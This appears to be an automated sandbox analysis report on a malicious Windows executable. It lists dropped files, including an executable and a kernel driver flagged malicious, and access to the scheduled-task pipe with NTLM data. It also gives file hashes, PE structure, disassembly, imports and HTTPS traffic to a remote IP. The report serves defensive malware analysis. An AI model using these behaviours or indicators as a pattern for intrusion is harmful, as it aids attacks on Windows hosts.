Preview:	SQLite format 33.....@ ...!.......$...........................................................!..n.......N..}...7.N...=.!so'.g..}_.S>Q..{.N.c....;G_fx5.#DO..g..}A....l=.2......'o...!.....e.&...o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|m....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1.."...`.,...~....)w.5E 1.V...0DA..~d..........<....> {......I...()G...9.#.h.7...=......!...s..X2.].+.c.o\|.L.U....p...8M+k.......g.....Z..-<..w..tHW...W......l.....wU........p.Z.N..%..v.....h(...Y....Z....0t${.s....s..k.l/.U.U.`D....S5x.V'{..7.+.0[.V..;#.lyt'RI.....\|f..Y.M1.r.w..v.............E......]<X....M..q.....t..F.i5...`...Y^..O6....A2.R.3!b...`...G`.81.M^T.{......o.S.... ...q..e..6..z.......-...F....:.&.......@.1....bI8..o.b.Cr..A...../..\.,,z@.....UX..9....T..,.f.bL...S........T........g.....

C:\Users\user\Documents\vIPphI.exe

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	138776
Entropy (8bit):	6.299362950486936
Encrypted:	false
SSDEEP:	3072:pIVf39AtRKuZkCi0UqcrkXuZ4Q4C0SgWQVUN9Lf9ct7mDRbPC:pIVGKuZ1vgrauUCjN5f9nlC
MD5:	DF76205EAF175184567FC44A83019B20
SHA1:	44F219ECFFF27BF81DCCEE076583D32CE5BF82BD
SHA-256:	A6123E13E12A1A1D4C4A4EB034769BFE8E229C3A9877E0DD173B422E700A26AC
SHA-512:	0C50564629B28D32E5EC74C4B76FBD2C79376838FF6B60DB92403E164BF7CDEECC7FD2A922C64356322C5150792CCD657EED0CB6D974E82682EFF5B6BB640E6A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: NKHod.76452.04.exe, Detection: malicious, Browse Filename: NHOji.25731.03.exe, Detection: malicious, Browse Filename: BSKDh.98374.10.exe, Detection: malicious, Browse Filename: BSKDh.98374.10.exe, Detection: malicious, Browse Filename: Gokod.763652.06.exe, Detection: malicious, Browse Filename: 287263487-92873475.04.exe, Detection: malicious, Browse Filename: 176320045-328764975.06.exe, Detection: malicious, Browse Filename: 1237458-28376475.12.exe, Detection: malicious, Browse Filename: 1726386475-238475987.12.exe, Detection: malicious, Browse Filename: 1237458-28376475.12.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w................................................S...............=...S......S...........S......Rich............................PE..d......f..........".................t-.........@.............................0............`..............................................................................L... ..d.......p...............................8...............X............................text...0........................... ..`.rdata..............................@..@.data...8...........................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................

C:\Windows\Temp\aceprocted.sys

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.228949285454577
Encrypted:	false
SSDEEP:	384:E3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/w:EOUkgfdZ9pRyv+uPzCMHo3q4tDgh2
MD5:	27200E392590188EA3F33FE6D6059F16
SHA1:	87FA55683DED0D90981FAAFCFA7EB2B8AD15259A
SHA-256:	7BC2357B3119D99EF7485305A1B6A11CE8FD9BD31587FCD4B48EE96518022170
SHA-512:	8BB84632FA9961F0EE16FE662D5D2DE1D15F6DBCDBE3C9173F31601E55C65394D9D98A9C0A55A0CEF7B7B62509C75ED2191FA1EDEABB60DADFD202DFB73784C6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	384374
Entropy (8bit):	7.993200825125416
Encrypted:	true
SSDEEP:	6144:RC20Nxb8q9KcepC1pf7HIXb5xPOO+AJ2tCwxvCdheCKxLlqmcMIxsWT1JiJ3R6:uB2cbl+POLAAvG4xLTcLDq6
MD5:	DA20628FDD0D14D4C02A8B70B3EFAC4D
SHA1:	B79C5949F9C87AB5633C37B0B5E2EB404804B825
SHA-256:	E3C5B6ECBDBE894B55A52683BA07DFA7D44038653BD9CC855D64434BEAF906A7
SHA-512:	A0FBEA4D534C93D61E938C84A9655AB9DEFEE8E0CDF6F6A0EB09ADDB27437BFC319462E1B595B719FF03E24EA8B0C8D21982F174CA1DC6488BE8CD46BF3F8A9A
Malicious:	false
Preview:	..........:.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......3.qq..7I......6........IY..D@.$.621......,..l..@E....................NTLMSSP.............1.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....QQ.70...G8..=..................\|.......IY..D@.$.621..%".....V...`..{t..z..%...$.J.....r]`....3.m......* ....e%.....RQ.'..........z...S4u_.S"..9<...{z..in.'.0pl.....@WV.h2I..B.VQQ7...$...~...p...4.Dto..e...].^.W...~.F....G..q.Z......{S.F..\...+1..`9.#.....H../.=Ew....=`.[..*.>....e...........?8....v,v.E..Iy.,......._..U.fcm..:...a.a<..<.t.._,.$0.1q..B..}U....._.O..Zg'.V....j1^[.......S.u.aQ...[....B.8,R_.7a&..CMG-#.y.\.l.u^a'&......y.".%Q..K...a.<?..`^EJ..]....53..@..<Va5.m?....R..lA~X...q.....w....%..u...{a..0...&.....S5Ns9.....H<....Ej.gF.........~.`.u..x.%.b.^..-.dB....~..c.:...N..ii.5....3g....M4Lu...mXsr.L2L4..!.]".pA....

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.230846481298861
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KHoDN.76532.10.exe
File size:	54'836'251 bytes
MD5:	96599c5a60e5589f37ec8e25f05f43c3
SHA1:	b3ed652bef2a2318c753332808cf989fd79ddca0
SHA256:	baf8f986caa4ad8b3e8a58fea88015ff1d677e4feff6bea71538fdd76b151f3c
SHA512:	0f2d4385a4e9727b10dd3496440b74669be1e5413d5a8bd9e3f480544d9d81ba2781ca433f6a1140d651192b8228f0870af84edc489f4ef8133b92131d6b9f7d
SSDEEP:	786432:VZj7D8iGKUg+MUdwpKXwA9m7WRbQ2d+kZ:3j7D87K3+MUdwjA9mahd
TLSH:	46C7F4758AEC255DF05AE231744605124B603E252AD85F8B71EC3903EF3A2F33A967DE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............a...a...a......Ba.......a.......a..f?...a..f?...a..f?...a....l..a...a...a..\|?...a..\|?...a..Rich.a..................PE..d..

File Icon


Icon Hash:	333154ccc455312b

Static PE Info

General

Entrypoint:	0x140004988
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x65811DAB [Tue Dec 19 04:35:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	703bba1796a4c2c5abd4d7a6677d9147

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FB729C7F1B8h
dec eax
add esp, 28h
jmp 00007FB729C7B542h
int3
int3
jmp 00007FB729C81828h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
jmp 00007FB729C7ED63h
dec eax
mov ecx, ebx
call 00007FB729C8182Eh
test eax, eax
jne 00007FB729C7ED54h
dec eax
cmp ebx, FFFFFFFFh
jne 00007FB729C7ED49h
call 00007FB729C7F6CBh
jmp 00007FB729C7ED47h
call 00007FB729C7F6A4h
dec eax
mov ecx, ebx
call 00007FB729C81880h
dec eax
test eax, eax
je 00007FB729C7ED17h
dec eax
add esp, 20h
pop ebx
ret
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0000D6BFh]
dec eax
mov ecx, ebx
call dword ptr [0000D6AEh]
call dword ptr [0000D6B8h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [0000D6ACh]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call 00007FB729C890A4h
test eax, eax
je 00007FB729C7ED49h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00018127h]
call 00007FB729C7EDEFh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [0001820Eh], eax
dec eax
lea eax, dword ptr [esp+38h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1adb4	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2f000	0x1add0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2b000	0xf6c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0x644	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19820	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19880	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1004a	0x10200	b2bdbee20056e9a1cb2f9ed9c57152d8	False	0.5626514050387597	data	6.381167149215314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x973e	0x9800	cf085b38253b3b7acdcf77aa66b9133c	False	0.4281198601973684	data	4.733134590640122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0xed88	0xd600	847ace07519def0f926421fefce1bccc	False	0.8763142523364486	data	7.69472150558311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2b000	0xf6c	0x1000	116e50f87c14b513a20c3357927b4af9	False	0.473388671875	data	4.821920540488533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x2c000	0xd8	0x200	c23b688ecec3d6e06b966cc151bc0fd4	False	0.23828125	Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary	1.1032669605253855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gxfg	0x2d000	0xf30	0x1000	9bf95207db8c3188eda0b7ea48e76f0c	False	0.418701171875	Sony PlayStation PSX image, 4-Bit, Pixel at (-20659,-10892) Size=136x0	4.891854711927857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gehcont	0x2e000	0xc	0x200	c92400c680e6d5fc738660d596b8969d	False	0.0390625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2f000	0x1add0	0x1ae00	8c8217b247e9c124f6246eb7428d64cb	False	0.10952943313953488	data	1.9859925224770918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0x644	0x800	cfb2e211114b4b458fb62237fa59f035	False	0.53173828125	data	4.818178961771943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2f238	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.20035460992907803
RT_ICON	0x2f6a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.17008196721311475
RT_ICON	0x30028	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.12218574108818012
RT_ICON	0x310d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.09585062240663901
RT_ICON	0x33678	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	English	United States	0.05780585734529995
RT_ICON	0x378a0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.03279900626996333
RT_ICON	0x480c8	0x1c3f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9000138293458719
RT_RCDATA	0x49d08	0x5c	data	English	United States	0.75
RT_RCDATA	0x49d64	0x2	data	English	United States	5.0
RT_GROUP_ICON	0x49d68	0x68	data	English	United States	0.75

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, WriteConsoleW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, VirtualAlloc
USER32.dll	wsprintfW, MessageBoxW
SHELL32.dll	ShellExecuteExW
SHLWAPI.dll	PathCombineW, PathRemoveFileSpecW, PathCanonicalizeW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 1027
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2025 03:15:46.690541029 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:46.690634966 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:46.690798998 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:46.702716112 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:46.702750921 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:47.667754889 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:47.667942047 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:47.668922901 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:47.668994904 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:47.711606026 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:47.711637020 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:47.712594032 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:47.712670088 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:47.713900089 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:47.760325909 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.033713102 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.033833027 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.033870935 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.033902884 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.033950090 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.033977985 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.040230989 CET	49732	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.040266037 CET	443	49732	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.266244888 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.266343117 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:48.266453981 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.266994953 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:48.267030001 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.231074095 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.231173992 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.282315969 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.282345057 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.284943104 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.284967899 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605453968 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605479956 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605518103 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605560064 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605592966 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.605628014 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.605654955 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.605690002 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923063040 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923162937 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923182011 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923214912 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923259020 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923285961 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923321962 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923407078 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923424006 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923484087 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923497915 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923522949 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:49.923566103 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:49.923589945 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241369009 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241481066 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241522074 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241553068 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241592884 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241626024 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241657019 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241720915 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241781950 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241847992 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241883039 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.241952896 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.241986036 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242058039 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242098093 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242157936 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242201090 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242264032 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242304087 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242376089 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242417097 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242491961 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242525101 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242609024 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242619038 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242641926 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.242681980 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.242706060 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559200048 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559302092 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559334993 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559367895 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559405088 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559442043 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559530973 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559602976 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559649944 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559714079 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559766054 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559832096 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.559885979 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.559967995 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560002089 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560064077 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560101986 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560163021 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560204029 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560267925 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560342073 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560412884 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560439110 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560507059 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560539007 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560600996 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560641050 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560707092 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560739040 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560801029 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560837984 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560899019 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.560928106 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560981989 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.560986996 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.561057091 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.563472986 CET	49733	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.563508034 CET	443	49733	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.606251955 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.606344938 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:50.606446028 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.606827021 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:50.606863022 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.578151941 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.578310966 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.579123020 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.579153061 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.579322100 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.579334974 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915230989 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915293932 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915322065 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.915366888 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915393114 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.915412903 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915437937 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.915447950 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.915467978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.915510893 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.922055960 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.922132015 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.925560951 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.925640106 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.930793047 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.930875063 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.934042931 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.934117079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.941903114 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.941992044 CET	49734	443	192.168.2.5	39.103.20.80
